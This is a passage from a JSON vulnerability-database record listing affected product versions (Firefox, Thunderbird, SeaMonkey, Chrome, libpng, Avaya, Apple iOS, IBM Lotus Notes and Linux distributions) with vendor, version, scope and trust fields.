},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.77"
},
{
"model": "beta19",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.15"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.13"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.112"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.11"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.7"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.12"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.9"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.8"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.15"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.4"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.216"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.24"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.344"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"model": "aura application server sip core pb23",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "8.0.1"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.1.1"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.5"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.215"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.200"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7.0.1"
},
{
"model": "thunderbird",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.19"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.19"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "seamonkey beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.02"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.202"
},
{
"model": "seamonkey alpha2",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "lotus notes fp5",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"model": "iron",
"scope": "ne",
"trust": 0.3,
"vendor": "srware",
"version": "18.0.1050.0"
},
{
"model": "firefox beta4",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.57"
},
{
"model": "conferencing standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.18"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.303"
},
{
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "tv",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0"
},
{
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.18"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.6"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.23"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.211"
},
{
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.18"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.8"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.19"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.104"
},
{
"model": "enterprise linux desktop version",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "8.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.12"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2011"
},
{
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.8"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.13"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.10"
},
{
"model": "enterprise linux desktop client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.17"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.26"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "11.0.700.1"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "9.0.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.024"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.4"
},
{
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "aura communication manager utility services sp",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.16.1.0.9.8"
},
{
"model": "productions pale moon",
"scope": "eq",
"trust": 0.3,
"vendor": "moonchild",
"version": "3.6.29"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.17"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.1"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.13"
},
{
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.215"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.0"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.14"
},
{
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.9"
},
{
"model": "storwize unified",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.23"
},
{
"model": "lotus notes",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.5"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.7"
},
{
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "tv",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.4"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.20"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.302"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.310"
},
{
"model": "messaging storage server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "messaging storage server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.4"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.3.5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.91275"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.5"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.12"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.9"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.14"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.27"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.7"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.5"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.9"
},
{
"model": "conferencing standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.1"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.13"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.8"
},
{
"model": "linux enterprise software development kit sp1 for sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.11"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.15"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.19"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.15"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "11.0.700.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.4"
},
{
"model": "firefox rc2",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.107"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.18"
},
{
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.3"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.202"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.16"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.6"
},
{
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.20"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.25"
},
{
"model": "message networking sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.68"
},
{
"model": "message networking sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "linux enterprise server for vmware sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.549.0"
},
{
"model": "seamonkey rc2",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "11.0.700.0"
},
{
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "firefox beta1",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.13"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.63"
},
{
"model": "communication server 1000e signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.6"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.207"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.5"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.5"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"model": "productions pale moon",
"scope": "ne",
"trust": 0.3,
"vendor": "moonchild",
"version": "9.2"
},
{
"model": "aura system manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.22"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.9"
},
{
"model": "messaging storage server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "thunderbird",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.2"
},
{
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.186"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.3"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.3"
},
{
"model": "aura session manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "informix genero",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "2.41"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.18"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "13.0.800.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.63"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.5"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2.3"
},
{
"model": "message networking sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "communication server 1000m",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.6"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.26"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.94"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.17"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.0.0"
},
{
"model": "enterprise linux hpc node optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.223"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.10"
},
{
"model": "firefox",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.27"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.3"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.3"
},
{
"model": "voice portal sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "communication server 1000m signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.6"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.3.8.3"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1.1"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.1"
},
{
"model": "communication server 1000e",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.6"
},
{
"model": "thunderbird esr",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.2"
},
{
"model": "tv",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "5.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.14"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.3.9.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.2"
},
{
"model": "aura application server sip core pb19",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.204"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.551.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.128"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.19"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.301"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.0"
},
{
"model": "communication server 1000m",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.14"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.5"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.1"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.7"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.222"
},
{
"model": "enterprise linux workstation optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.2"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.65"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.6"
},
{
"model": "seamonkey 2.1b2",
"scope": null,
"trust": 0.3,
"vendor": "mozilla",
"version": null
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.9"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.15"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.3"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.1.0"
},
{
"model": "communication server 1000m signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.1"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"model": "communication server 1000e",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.23"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.1"
},
{
"model": "iron",
"scope": "eq",
